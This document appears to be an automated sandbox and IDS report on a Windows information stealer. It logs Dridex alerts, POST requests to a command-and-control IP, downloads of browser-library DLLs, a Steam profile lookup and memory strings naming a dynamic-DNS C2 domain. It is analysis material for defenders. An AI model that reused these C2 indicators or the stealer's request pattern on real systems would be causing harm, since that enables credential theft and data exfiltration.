Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49874 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49886 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49922 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49941 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49963 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49930 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49987 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49976 -> 95.217.220.103:443
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49950 -> 95.217.220.103:443
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DHCFIDAKJDHIECBFCBKK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Content-Length: 255
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Content-Length: 7977
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /sqlp.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Content-Length: 4677
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Content-Length: 1529
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FCFBAKJDBKJJKFIDBGHC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /freebl3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
    GET /mozglue.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
    Host: 95.217.220.103
    Connection: Keep-Alive
    Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 99261Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFBGDGHIIJJKEBKJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: unknownTCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: C:\Users\user\Desktop\UMrFwHyjUi.exe | Code function: 2_2_00406963 InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle, 2_2_00406963
                          Source: global traffic | HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                          Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
                          Source: global traffic | DNS traffic detected: DNS query: cowod.hopto.org
                          Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DHCFIDAKJDHIECBFCBKK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 255 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.JDHJKECAKEHI
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.CAKEHI
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/b
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/~
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgEHI
                          Source: UMrFwHyjUi.exe, 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoECAKEHI
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555218963.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: UMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2694126228.000000001DC3D000.00000002.00001000.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://95.217.220.103
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2572052639.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/%M
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/)
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/-
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/.
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/5
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/9M
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/=M
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/O
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/QMty
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2560144909.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/U
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/UMHy
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/freebl3.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/freebl3.dllm
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/mozglue.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/msvcp140.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2572165700.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555160578.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2571836136.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2572165700.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2571836136.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dll:
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/ography
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988407679.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/rosoft
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/softokn3.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/softokn3.dllC
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/sqlp.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/sqlp.dllu
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/uM
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/vcruntime140.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103AAK
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
